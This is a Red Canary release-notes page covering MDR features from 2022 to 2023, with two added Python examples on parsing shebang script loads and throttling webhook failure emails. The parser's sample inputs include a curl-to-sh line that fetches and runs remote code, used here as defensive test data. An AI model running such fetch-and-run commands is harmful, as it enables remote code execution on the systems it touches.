    Active Remediation:

    Other:

    March 2023

    New/Updated Features

    SentinelOne Cloud Funnel 2.0 Integration
    Red Canary now supports SentinelOne’s latest data ingest mechanism, Cloud Funnel 2.0. With this upgrade, our new SentinelOne customers can easily set up and configure data integration with Red Canary using just a few pieces of information. This upgrade offers additional enrichment to XDR data from SentinelOne’s Singularity data lake streamed directly into Red Canary’s AWS S3 storage. An example of this is the inclusion of OsSource process data, which improves how Red Canary determines process lineage, resulting in increased detection coverage and investigative efficiency. We will automatically migrate all existing customers to this new mechanism over the next few weeks. For more information, see Integrate SentinelOne Cloud Funnel with Red Canary.

    Improved Azure AD Response Actions
    Azure AD response actions can now optionally fire without user approval, and can be triggered by alerts rather than only by detections. These changes expand the scope and increase the speed with which you can respond to threats impacting your users, decreasing mean time to respond. This is especially useful if you’ve set up automation in Red Canary for Microsoft 365 Defender alerts. For more information, see Response Actions for Entra ID.

    Enhanced Linux EDR Sensor Script Loading
    The Linux EDR sensor now captures “shebang” script load information. If a process start invokes a “shebang” script (a file beginning with '#!'), the sensor now outputs information about that script’s content (currently limited to 1KB) and any intermediate interpreters of that script (for example, /usr/bin/env in a script that begins with #!/usr/bin/env python3), in addition to the executable information.
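To make concrete what this note and the Scriptload Telemetry note earlier on this page describe, here is an added example, not the Linux EDR sensor's code, that parses a shebang line the way the Linux loader does, expands /usr/bin/env indirection into the chain of interpreters that actually execute, and captures at most 1 KB of the script body. The sample scripts are constructed, and the PATH lookup that env performs is simulated with a small table; both are assumptions, not anything the page states.

```python
"""Parse a shebang line and build the kind of record a script-load telemetry source emits.

Added example, not the Linux EDR sensor's code. Assumptions, not taken from the page:
PATH lookup for /usr/bin/env is simulated with a small table, the sample scripts are
constructed, and the 1 KB limit is applied as the first 1024 bytes of the file.
"""
import os
import shlex

CONTENT_LIMIT = 1024  # the release note says captured script content is limited to 1KB

# Constructed stand-in for the PATH search that /usr/bin/env performs.
ASSUMED_PATH_LOOKUP = {
    "python3": "/usr/bin/python3",
    "bash": "/bin/bash",
    "perl": "/usr/bin/perl",
}

# Constructed sample scripts (not from the page, not real malware).
SAMPLE_SCRIPTS = {
    "env_python": b"#!/usr/bin/env python3\nimport os\nos.system('id')\n",
    "bash_flag": b"#!/bin/bash -e\ncurl -s http://example.invalid/x | sh\n",
    "env_s_perl": b"#!/usr/bin/env -S perl -w\nprint 'hi';\n",
    "env_bad_arg": b"#!/usr/bin/env python3 -u\nprint('never runs')\n",
    "elf_binary": b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8,
    "long_script": b"#!/bin/bash\n" + b"echo padding line\n" * 100,
}


def parse_shebang(content: bytes):
    """Return (interpreter, optional_argument) from a '#!' first line, or None without one.

    The Linux loader splits the shebang line into at most two fields: the interpreter
    path and ONE optional argument that receives everything after the first whitespace.
    """
    if not content.startswith(b"#!"):
        return None
    first_line = content.split(b"\n", 1)[0][2:].strip()
    parts = first_line.split(None, 1)
    if not parts:
        return None
    interp = parts[0].decode("utf-8", "replace")
    arg = parts[1].decode("utf-8", "replace") if len(parts) > 1 else None
    return interp, arg


def interpreter_chain(interp, arg):
    """Expand /usr/bin/env indirection into the list of interpreters that actually execute."""
    chain = [interp]
    if os.path.basename(interp) == "env" and arg:
        if arg.startswith("-S "):
            tokens = shlex.split(arg[3:])  # env -S re-splits the rest like a shell would
        else:
            tokens = [arg]  # no -S: the whole remainder is one program name, spaces included
        prog = tokens[0] if tokens else None
        if prog:
            # A name such as "python3 -u" never resolves; the script fails to start,
            # which is itself worth seeing in telemetry.
            chain.append(ASSUMED_PATH_LOOKUP.get(prog, f"<unresolved:{prog}>"))
    return chain


def script_load_record(path: str, content: bytes):
    """Build the record this example emits for one shebang script load (None for non-scripts)."""
    parsed = parse_shebang(content)
    if parsed is None:
        return None
    interp, arg = parsed
    return {
        "path": path,
        "interpreters": interpreter_chain(interp, arg),
        "shebang_arg": arg,
        "content": content[:CONTENT_LIMIT].decode("utf-8", "replace"),
        "truncated": len(content) > CONTENT_LIMIT,
    }


if __name__ == "__main__":
    for name, body in SAMPLE_SCRIPTS.items():
        rec = script_load_record(f"/tmp/{name}", body)
        print(name, "->", None if rec is None else (rec["interpreters"], rec["truncated"]))
```

Two details are worth keeping in mind when reading this telemetry: the truncated flag tells you when a script was longer than the captured 1 KB, so a payload appended after a long benign preamble will not be in the captured content; and the interpreter chain is what links a suspicious bash or python3 process back to the script file that started it, even though the process tree shows env in between.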

    More Efficient Linux EDR Telemetry Searches
    Linux EDR customers can now hunt and interact with telemetry more efficiently. The search tool has been improved to make it easier for users to search while keeping the original search functionality for our experienced users. In addition, one of our new features enables you to easily specify date and time ranges within a search. Finally, a slide-out panel has been added to make it easier to view telemetry details.

    Threat Filtering Improvements
    Filtering for threats is now even more extensive with the new threat table matrix. You can now filter by up to ten attributes and the table order has been rearranged to make filtering and searching more intuitive. For more information, see Navigate Threats.

    New Documentation

    February 2023

    New/Updated Features

    Response Actions for Azure Active Directory (AzureAD)
    Red Canary now supports response actions for Azure Active Directory (AzureAD). Using Red Canary's updated playbook features, Threat Investigation customers can manually or automatically revoke session tokens, and suspend and unsuspend users. This new feature provides you with advanced remediation options to quickly respond to and stop threats. For more information, see Response Actions for Entra ID.

    Support for Palo Alto Cortex XQL
    Red Canary now utilizes Palo Alto Cortex XQL capabilities to retroactively search for developing threats in historical process telemetry, ensuring that Palo Alto Cortex customers are protected from the latest emerging threats as new attacker IOCs are identified.

    New Documentation

    January 2023

    New/Updated Features

    Microsoft Defender for Cloud Integration
    Red Canary now supports MDR for Microsoft Defender for Cloud. Defender for Cloud enables you to continually assess, secure, and defend your Azure, AWS, and Google Cloud Platform infrastructure. Red Canary assesses Defender for Cloud alerts and threats that are correlated to other threats and alerts in your cloud environment. For more information, see Integrate Microsoft Defender for Cloud with Red Canary.

    Lacework Polygraph Integration
    Red Canary now supports MDR for Lacework. Lacework looks for abnormal behavior rather than using a strict rules-based analytics approach. As such, there can be higher false positives in Lacework, but this approach can be more flexible to changing threats in your cloud environment. Red Canary monitors Lacework alerts for threats and correlates this telemetry to other threats and alerts in your cloud environment. Today, Red Canary is focused on detecting active (post compromise) threats in your environment, and in the near future we’ll be able to help you identify and respond to critical misconfigurations as well. For more information, see Integrate Lacework Polygraph with Red Canary.

    Expanded Content and Filter Options on Activity Feed
    We have expanded the content and filter options on the Activity Feed to include Intelligence Profiles. Red Canary develops Profiles to help describe threats and summarize their associated behaviors. You can now have your Activity Feed inform you when Red Canary publishes new Intelligence Profiles.

    Automation Action for Endpoint Reporting Tags
    You can now create an automation action to apply reporting tags to endpoints. Reporting tags allow you to add additional metadata to help organize and categorize endpoints within your environment. This feature enables you to automatically apply existing or new tags to endpoints based on an endpoint trigger event. When an endpoint changes statuses or exceeds a last check-in time threshold, you can immediately apply relevant tags to help manage the endpoints without human intervention.

    API Updated to Allow Threat Remediation as TEST
    We have updated our API to reflect that Threats can be remediated as TEST. The Red Canary platform offered four “not remediated” reasons when resolving a threat, but the API only exposed three. We added not_remediated_authorized_testing to the API to match the platform, so you can now resolve a threat without remediation and mark it “This was testing” for clarification.

    Microsoft Sentinel Integration Expanded with SIEM
    We’ve expanded our integration with Microsoft Sentinel to harness the power of SIEM (Security Information and Event Management) for threat detection and response. Red Canary integrates with Microsoft Sentinel incidents generated from Microsoft’s built-in analytics. By ingesting and reviewing your Microsoft incidents, Red Canary can help protect against identity-based threats, improve your cloud security coverage, and operationalize more of Microsoft’s security tools. For integration directions, see Integrate Microsoft Sentinel with Red Canary.

    CrowdStrike Endpoint Logon Telemetry
    Red Canary now supports MDR for CrowdStrike endpoint logon telemetry for all CrowdStrike EDR customers. Red Canary ingests, normalizes, and investigates device logon telemetry from CrowdStrike Falcon agents. This new visibility means Red Canary can detect brute force and other identity based threats using the CrowdStrike agents that customers have deployed in their environment. For more information, see Identity detection support for CrowdStrike EDR.

    Improved Handling for Microsoft Sentinel Incidents
    You can now verify Red Canary’s handling of Microsoft Sentinel incidents. When Red Canary publishes a threat related to a Microsoft Sentinel incident, Red Canary adds a comment to the incident in Microsoft Sentinel with a link to the published threat in Red Canary. This lets you pivot from Microsoft Sentinel to Red Canary and confirm that Red Canary is investigating your Microsoft Sentinel incidents.

    Industry News Section Added to Intelligence Products
    We have expanded our Intelligence Products by adding Industry News as its own section. The Red Canary Intelligence team reviews and curates the latest cybersecurity news that is relevant. This new page keeps you abreast of emerging and prevalent threats, allowing you to make informed decisions regarding your security posture. Check out Intelligence Products for more information.

    New Documentation

    New Videos

    December 2022

    New/Updated Features

    • You can now protect your Google Workspace with Red Canary MDR. Google Workspace (formerly known as G Suite) includes Gmail, Sheets, Drive, Docs, and many other productivity tools. Gmail is a critically important tool to protect, and Red Canary has stepped up as an MDR partner to protect the entire Google Workspace suite. Our integration collects telemetry and alert data from the entire Google Workspace productivity suite, giving the Red Canary team better visibility into potential threats in your environment. For more information, see Integrate Google Workspace with Red Canary.

    • Our new PDF and report subscriptions feature enables you to track the impact and effectiveness of your security operations program. Reports can now be saved to PDF format, which matches what is displayed in Red Canary. Reports can also be executed on a schedule (weekly, monthly, quarterly, etc) and distributed via email with a PDF attachment. For more information, see View Reports.

    • Our updated Threat Timeline is now easier to understand and work with, providing the information that you need in a more consistent, accessible, and concise experience. Every Activity in a Threat Timeline now has the same core components: Title, Narrative, and Details. A new “badge” system, on the left side of an Activity, shows information such as Threat Occurred, Indicator of Compromise, or the Endpoint Specified in the Activity. The Annotations and Notes experience is now simply “Comments”. For more information, see Confidence from Context: The Red Canary threat timeline.

    • We’ve released a new integration with Palo Alto Networks, adding Cortex XDR and broadening its detection coverage for mutual customers. Red Canary can now investigate Cortex XDR detections from all Cortex XDR data sources, including network, endpoint, cloud, and third-party data, helping to provide enterprise-wide monitoring. Cortex XDR’s Native Incident Alerts, triggered off of IOCs and BIOCs, are correlated with Red Canary’s detections across the IT environment to provide additional validation and context, all delivered in a unified timeline. Cortex XDR offers various response actions that enable customers to investigate the endpoint and take immediate action to remediate it. You can now use response actions to isolate an endpoint and ban suspicious file hashes environment-wide for faster remediation and ongoing security posture enhancements. For more information, see Integrate Palo Alto Cortex XDR with Red Canary.

    • We’ve expanded MDR coverage of users’ network environment by adding support for Cisco Meraki. Red Canary now investigates and correlates security alerts from Cisco Meraki products to better detect and respond to Threats for users. For more information, see Integrate Cisco Meraki with Red Canary.

    New Documentation

    New Videos

    November 2022

    New/Updated Features

    • Red Canary now syncs the SentinelOne analyst verdicts and the incident status fields used to triage and record investigation status and disposition inside of the SentinelOne console with the alert record maintained within Red Canary. This update keeps SentinelOne in lockstep with Red Canary by preventing duplicate efforts and easing user analyst response time and workload.

    • When responding to threats in a CrowdStrike environment, users can now use the automate action, Delete a Registry Key, in the automation section of Red Canary. This enables remediation and incident response to occur without human involvement.

    • We’ve expanded MDR coverage of users' IT environments by adding support for the latest version of Microsoft Graph API. Red Canary investigates and correlates security alerts from third-party security products to better detect and respond to Threats for users and is pleased to recommend the enhanced v2 of this API. For more information, see Integrate Microsoft Graph V2 with Red Canary and Use the Microsoft Graph security API.

    • We’ve expanded MDR coverage of customers’ SaaS environments by adding support for Microsoft Defender for Cloud Apps. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate Microsoft Defender for Cloud Apps with Red Canary.

    • Logon events can now be viewed in your identity threat timeline. Red Canary can now add more context to identity threat timelines. For example, if we publish a threat concerning a suspicious email rule, you will see relevant logon events from the user in question. This context helps you better understand why the threat was published, what happened, and what you can do to respond and prevent future threats.

    • 'Threat' has replaced 'detection' as the trigger option for automation. To standardize terminology throughout the platform, the term ‘threat’ has replaced ‘detection’ since it more clearly describes the trigger action to be performed. The dropdown menus in Triggers reflect this update.

    • Live Response Command and Live Response Isolation have been added as Audit Log Trigger options. These were previously available only to Carbon Black Response customers and are now available to customers using the VMware Carbon Black Cloud EDR platform, giving them more Trigger options.

    New Documentation

    New Videos

    October 2022

    New/Updated Features

    • Manual approval for Okta playbooks is no longer required. Manual approval is now optional and can be automated.

    • Expanded MDR coverage of customers’ network environment by adding support for ExtraHop Reveal(x) 360. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate ExtraHop Reveal(x) 360 with Red Canary.

    • Expanded MDR coverage of customers’ network environment by adding support for ExtraHop Reveal(x) Enterprise. Red Canary investigates and correlates security alerts from these products to better detect and respond to Threats for customers. For more information, see Integrate ExtraHop Enterprise with Red Canary.

    • If a webhook fails, Red Canary will notify your technical contacts by sending an email detailing the failure, so you can troubleshoot. To prevent flooding the inbox, we send only one Webhook Failure email per playbook every 24 hours. In addition to sending the email, we create an Audit Log entry with "Action: Automate Action Executed" and include details about the error in its Details section, so the audit log remains the complete record of failures even when the email for a playbook has already gone out.

    • Google Workspace is now available in public preview as a supported MDR integration. Red Canary monitors raw telemetry from Google and publishes threats based on our proprietary analytics.

      Note: As of October 31, 2022, this integration is available as a public preview feature only. To get access to the preview, reach out to your Red Canary account team.

    • You can now view raw JSON data within your Red Canary dashboard by clicking Alerts, selecting an Alert ID, and then clicking the Show original alert drawer.

    • Red Canary can now push status updates for alerts back to the SentinelOne Singularity platform so that users see the updated status in their SentinelOne dashboard.

    • The Alert List view in the Alerts section has been updated so that it displays the list of associated Events or Threats for an Alert.

    • The Red Canary Hosted VMware Carbon Black EDR fleet has been upgraded to version 7.6.2. This upgrade incorporates the latest Red Canary tested and validated Carbon Black Response features and security patches. Additionally, a new telemetry source that captures fileless script loads has been added to provide enhanced security coverage of malicious process execution.
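The webhook failure policy described above (one email per playbook every 24 hours, an audit log entry for every failure) is easy to get subtly wrong in either direction. Here is an added example, not Red Canary's implementation, that applies the policy with the clock passed in explicitly so the 24-hour window can be exercised without waiting. The mail queue, the audit log and the replayed failures in simulate() are all constructed stand-ins.

```python
"""Throttle webhook failure emails to one per playbook per 24 hours, logging every failure.

Added example, not Red Canary's implementation. The mail queue and audit log are
in-memory lists and the clock is passed in explicitly so the window can be exercised
without waiting; the failure events in simulate() are constructed.
"""
from datetime import datetime, timedelta, timezone

EMAIL_WINDOW = timedelta(hours=24)


class WebhookFailureNotifier:
    def __init__(self):
        self._last_email = {}  # playbook_id -> time the last failure email was sent
        self.emails = []       # stand-in for the outbound mail queue
        self.audit_log = []    # stand-in for the audit log

    def record_failure(self, playbook_id, url, status, error, now):
        """Log the failure unconditionally; email only if the window for this playbook has passed.

        Returns True when an email was sent, False when it was suppressed.
        """
        # The audit log receives every failure, so it stays the complete record
        # even when the email for a playbook has already gone out in this window.
        self.audit_log.append({
            "action": "Automate Action Executed",
            "playbook_id": playbook_id,
            "details": {"webhook_url": url, "http_status": status, "error": error,
                        "time": now.isoformat()},
        })
        last = self._last_email.get(playbook_id)
        if last is not None and now - last < EMAIL_WINDOW:
            return False
        self._last_email[playbook_id] = now
        self.emails.append({
            "playbook_id": playbook_id,
            "subject": f"Webhook failure for playbook {playbook_id}",
            "body": f"{url} returned {status}: {error}. See the audit log for every failure.",
            "time": now,
        })
        return True


def simulate():
    """Replay a constructed day of failures for two playbooks and return the notifier."""
    t0 = datetime(2022, 10, 31, 9, 0, tzinfo=timezone.utc)
    n = WebhookFailureNotifier()
    hook_a, hook_b = "https://hooks.example.invalid/a", "https://hooks.example.invalid/b"
    n.record_failure("pb-isolate", hook_a, 503, "upstream down", t0)
    n.record_failure("pb-isolate", hook_a, 503, "upstream down", t0 + timedelta(hours=1))
    n.record_failure("pb-notify", hook_b, 401, "bad token", t0 + timedelta(hours=1))
    n.record_failure("pb-isolate", hook_a, 503, "upstream down", t0 + timedelta(hours=23, minutes=59))
    n.record_failure("pb-isolate", hook_a, 503, "upstream down", t0 + timedelta(hours=24))
    return n


if __name__ == "__main__":
    n = simulate()
    print(f"{len(n.audit_log)} failures logged, {len(n.emails)} emails sent")
```

The practical consequence for an operator is the one the note hints at: a single email means at least one failure, not exactly one, so the audit log, not the inbox, is where to count how often a playbook's webhook is actually failing.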

    New Documentation

    New Videos

    September 2022

    New/Updated Features

    • When you click a link to an Endpoint, Identity, or Intelligence Profile on the Threats page of Red Canary, we now show some of that page’s content in a slide-out panel so that you can view it without having to open another page or tab.

    • You can now add an external service in Microsoft Office 365 without accidentally adding a duplicate external service in Office 365.

    • Red Canary now supports an additional automation action for SentinelOne users. This automation action enables you to configure Red Canary responses to execute processes on endpoints based on your playbook triggers.

    • Forensic packages will now be collected and executed correctly. You can now automatically collect additional forensic information from endpoints for preservation purposes with increased resilience and accuracy.

    • Dark Mode is now available for your homepage setup.

    • Your Red Canary homepage now includes an alerts section with telemetry and alert data types.

    • A new plugin for Response Actions is available for Linux users. The response actions plugin enables you to run actions on a Linux endpoint triggered in response to threats. This update also applies to the Red Canary Portal Automations feature. For more information, see Use the Response Actions Plugin.

    New Documentation

    New Videos

    August 2022

    New/Updated Features

    • Customers who subscribe to Linux EDR can now filter and review telemetry observed within the last 7 days. To learn more, see Filtering telemetry.

    • When you log in to Red Canary, enjoy a newly redesigned homepage that now displays vital threat information front and center. Additional data is also now available on the homepage, including:

      • Key activities Red Canary has performed in the last 90 days, such as the number of leads investigated and threats discovered

      • The number of endpoints monitored over a specified timeframe

      • An enhanced activity feed that not only shows you security actions executing in your environment, such as playbooks firing, but also additional industry news, blog posts, and more.

      • The amount of telemetry and number of alerts Red Canary has ingested and analyzed from your integrated security products over a specified timeframe

      • Highlighting any actionable items, such as unresolved threats, endpoints not sending telemetry, and alert sources needing configuration

    • Okta Workforce Identity Events with the classification of “A bypass of MFA may have been attempted for this user“ will now be ingested as alerts and triaged for Threat Investigation users.

    • Palo Alto Networks Threat Prevention now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • When you resolve a SentinelOne alert in Red Canary, the resolution status updates automatically in SentinelOne.

    New Documentation

    New Videos

    July 2022

    New/Updated Features

    • Microsoft Defender for Endpoint customers can now quickly identify which of their endpoints are Live Response capable in the Red Canary portal. Live Response through the Microsoft Defender for Endpoint sensor requires specific Windows versions and builds, and endpoints are now automatically tagged to identify which endpoints are Live Response capable.

    • Red Canary Analytics now incorporates CrowdStrike notifications that relate to detected ransomware creating files on an endpoint. This provides us further ability to monitor and alert you when ransomware attacks occur.

    • In the Expert Analysis & Investigation report, we updated “Investigated Events” to “Analyzed Events,” which now matches the corresponding By the Numbers report value.

    • Cisco Umbrella now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Palo Alto Networks WildFire now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Red Canary now automatically synchronizes SentinelOne site names to a Red Canary reporting tag. Reporting tags can be used in automations and endpoint filtering.

    • You can now click on correlated identities and navigate to the identities detail page from the Alerts table page.

    • Red Canary’s parsing logic has been enhanced to account for certain Dragos alerts that include special characters as leading or trailing identifiers in the alert. These characters were causing errors when parsing the alert data.

    • Darktrace parsing is now enhanced to handle nested JSON data in the native alert information.

    • Alerts that are re-ingested will no longer be escalated as a new event. This issue was duplicating events when ingesting occurred.

    • PAN-OS alerts that contain multiple nested alerts are now parsed correctly as separate, individual alerts within Red Canary.

    • Playbook triggers have been updated to replace the legacy “Priority” attributes with the new “Status” attributes. You do not need to take any action with this update.

    • Parsing for Fortinet FortiGate alerts is now updated to correctly map the data attributes to the Red Canary data schema.

    New Documentation

    June 2022

    New/Updated Features

    • Alerts are now assigned to either “Red Canary” or “Your Team” based on which team is responsible for the alert during its investigation.

    • You can now create, edit, and delete endpoint and identity tags in bulk, speeding up the process of updating your endpoint and identity environment.

    • You can now more easily determine where your attention is most needed by viewing and sorting Intelligence Profiles based on how prevalent they are in an environment.

    • When searching for alerts in a specified timeframe, the results correctly aggregate and display the alerts within that range.

    • The GuardDuty network connection parser now creates a single correlated device for the internal IP address.

    New Documentation

    May 2022

    New/Updated Features

    • Red Canary looks a little different! We’re updating the interface to be easier to navigate and more user-friendly. Most notably, the left navigation menu has been updated to include subpages for faster navigation, and the background has been changed to provide more contrast for better readability. Be on the lookout for updates as we continue to finesse these changes.

    • The Alerts page has been updated to support Red Canary’s alert management service. You can now review all your alerts ingested by Red Canary in one place while also being able to search for a set of alerts or individual alerts, view an alert’s details, determine the current status of an alert, and see if an alert is part of an ongoing event or threat.

    • Red Canary Alerts now have new Status states and an updated workflow that better supports the new end-to-end Managed Detection and Response (MDR) service. With this update, Red Canary can provide detection and response beyond the traditional EDR endpoints.

    • To help you find threats of account takeover, Red Canary now examines raw telemetry from Microsoft Office 365. To learn more about integrating Office 365 with Red Canary, check out Integrate Microsoft Office 365 with Red Canary.

    • VMware Carbon Black Response customers hosted by Red Canary will now expedite data archival.

    • The is_protected status has been removed from Red Canary to prevent inaccurate reporting and playbook actions. This status was originally intended to show that an endpoint was both checking in and sending telemetry to Red Canary within the previous 3 hours, but because of the random nature of EDR telemetry collection, it wasn’t a reliable measure of an endpoint’s status. With this change, playbooks using the is_protected status as a trigger will no longer work.

    • VMware Carbon Black Response users will now see status check help text in Red Canary that is updated to match the VMware features and setting name changes introduced in version 7.5.1.

    New Documentation

    April 2022

    New/Updated Features

    • VMware Carbon Black EDR Windows Sensor Version 7.3.0 is now available across the Red Canary hosted Carbon Black server fleet. Learn more about Sensor Version 7.3.0.

    • You can now use the CrowdStrike kill process response action to quickly remediate process threats.

    • Jamf users can now update their Jamf isolation group using Red Canary’s external service configuration.

    • We’ve updated the term “detections” and “confirmed threats” in Red Canary to just “threats.” This is part of a larger initiative to streamline the threat timeline to provide a more holistic view of what is or has occurred during a threat. This change won’t impact your APIs and URLs. Look for more information about the updated threat timeline in the coming weeks.

    • You’re now able to respond to and isolate any endpoint in your Jamf environment. Jamf was previously limited to the first 100 endpoints, which limited response actions.

    • You can now collect forensic packages on CrowdStrike endpoints. Users managed by Red Canary’s Managed Security Service Provider (MSSP) will notice the addition of a “run” permission in a real-time response, which enables this collection to occur.

    New Documentation

    March 2022

    New/Updated Features

    • Four new Security Alert Automation Playbooks were added to Red Canary. The new playbooks include Assign an alert to a user, Unassign an alert, Set alert investigation result, and Add note to an alert. These new playbooks provide more flexibility to users when managing alerts.

    • The integration between Red Canary and Okta Workforce Identity was enhanced to capture additional alert information types related to account locks, privilege escalation, privilege revoke, password reset, and secondary email creation. These alert types are potential indicators of compromise (IOC) and are useful data points for threat investigations.

    • A new status monitoring and notification feature was added to the Status Checks interface in Red Canary. This notification will alert users if the API polling for their configured Alert Source platforms stops responding and requires attention.

    • The Jamf provisioning process no longer requires the Jamf Support team to engage. This helps streamline the provisioning process.

    • The Top 20 observed MITRE ATT&CK techniques have been updated based on the 2022 Threat Detection Report.

    • We’ve added the following examples of our Incident Handling team’s playbooks to Red Canary:

      • IH - Phone Escalation: calls and texts specified phone numbers in the event of a detection

      • IH - Isolate: automatically isolates an endpoint without requiring human approval

      • IH - Isolate Approval: sends an email requesting approval to isolate an endpoint

      • IH - IOC Remediation: runs through a series of processes to remediate indicators of compromise (IOC)

      • IH - Notify Customer of New Note: sends an email when Red Canary creates a new note

    • To provide a more accurate view of SentinelOne Singularity alerts, the alerts detail display was updated to include the correct corresponding detail information.

    • The Red Canary by the Numbers report now returns an accurate count of investigative leads.

    • The Confirmed Threats report has been updated to more accurately reflect where confirmed threats came from.

    • If you had received an email with a link to a specific page in Red Canary but weren’t signed in through single sign-on, you would have been directed to authenticate then redirected to the Red Canary dashboard. Now, after authenticating through single sign-on, you’ll be directed to the correct page that was linked.

    • The security alert data parser has been updated to resolve problems with identifying native Cylance security scoring data. This update provides more context to the alert and allows for better prioritization of information.

    • The Alert Source integration configuration now decommissions previous data collectors when customers change their data ingest method (API, Syslog, TCP, HTTPS). Prior to this fix, you could receive redundant Alerts due to both the old and new ingest methods remaining enabled.

    • There was an issue where a user could receive a “404 - Not Found” error when searching for Automate Playbook Executed in an audit log. Audit logs should now return all results.

    • Previously, if a user entered an invalid search term on the Endpoints page, the page would error without notifying the user. Now if a user’s search fails, they will receive a notification that links them to information about valid search terms.

    • Sorting on the Applications page now takes numbers in an application’s name into account. Previously, names that contained numbers were ignored.

    New Documentation

    February 2022

    New/Updated Features

    • Imperva Web Application Firewall (WAF) security related alerts are now supported in Red Canary. You can view Imperva WAF security related notifications in Red Canary to prioritize and manage your security alerts.

    • Jamf now generates external alerts within Red Canary. You now have another option when it comes to third-party security platforms that generate external alerts.

    • Cisco Firepower is now supported as part of the threat investigation service. You can configure the ingestion of Cisco Firepower alerts via email. These alerts are aggregated and correlated to endpoint and identity data across your enterprise. For users with the threat investigation service, Red Canary analysts will provide Tier 1 triage and prioritization of these network alerts to help streamline your threat remediation process.

    • GitHub security-related alerts are now supported in Red Canary. You can view GitHub security-related notifications in Red Canary to prioritize and manage your security alerts.

    • The detection timeline now uses the term “blocklist” instead of “blacklist” as part of our inclusive language effort.

    • We’re excited to announce that Intelligence Insights are now available in Red Canary. Intelligence Insights are researched and developed by the Red Canary Intelligence Team and designed to provide you with both long-term trends and time-sensitive threat intelligence so you can make informed decisions about your security posture.

    • All existing customers are enrolled to receive Intelligence Insights emails, and you can also view them directly in Red Canary by clicking Analytics & Intelligence, and then clicking Intelligence Insights. You’ll find all previously published Intelligence Insights here as well.

      To opt out of receiving Intelligence Insights emails, navigate to your user profile, and then unselect Email me when Red Canary publishes an intelligence insight.

    • Sorting on the Applications page now takes into account lowercase names.

    • The Getting Help page in Red Canary was updated with information about who to contact at Red Canary for technical support and emergencies.

    • Jamf Pro and Jamf Protect sensor IDs now correlate within Red Canary for all supported macOS versions. The full hostname and endpoint data from Jamf Pro is now related to your Jamf Protect telemetry.

    New Documentation

    January 2022

    New/Updated Features

    • Alert Filters replaced the Suppression Rules tab under External Alerts. Previously, you could only mark alerts as "Not a threat." Now you can proactively change alert status, assign alerts to specific users, and add comments. These additions greatly improve your alert management capabilities by automatically advancing known or previously triaged alert types through your alert management process.

    • Response actions have been added to the Red Canary and Jamf integration. You can now add and remove Jamf endpoints from network isolation groups enabling rapid remediation. For more information, see Isolate and De-isolate Endpoints using Jamf.

    • Red Canary now collects identity information about confirmed threats from Okta Workforce Identity. This enables us to provide a faster, more complete response for customers using Okta.

    • As a customer_admin, you are now able to reset the Carbon Black Live Response using the Getting Help page. This is useful when Live Response becomes non-responsive. This function is only available for Red Canary-hosted Carbon Black Response servers at this time.

    • You can now import security alert data from Fortinet FortiGate for analysis and management within the Red Canary platform using syslog ingestion.

    • Additional security data attribute aggregation has been added to Palo Alto PAN-OS source platforms. These additional attribute fields will allow us to correlate alerts to endpoints and provide threat identification data for PAN-OS alerts.

    • Endpoints running Jamf Protect can now be added and removed from network isolation in Red Canary.

    • Automated playbook actions will now trigger based on the alert priority.

    • In accordance with our end of life policy, the following recently outdated sensor versions will be supported until April 7, 2022.

    • Alert data from Proofpoint Targeted Attack Protection now correlates to endpoints correctly. In previous versions, a data parsing issue resulted in erroneous endpoint identification.

    • Jamf timelines now include all process trees and related file modification indicators. This data helps to improve clarity and analysis of confirmed threats by including context around detections.

    • SentinelOne users now have a streamlined view of tip-offs, due to correlated external alerts generating unique tip-offs on a per-event basis.

    • Cisco Umbrella and Cisco Duo alerts will no longer experience data ingestion failures due to security data parsing issues.

    • API polling for SentinelOne security alert data ingestion now includes the correct identification of account ID information.

    New Documentation
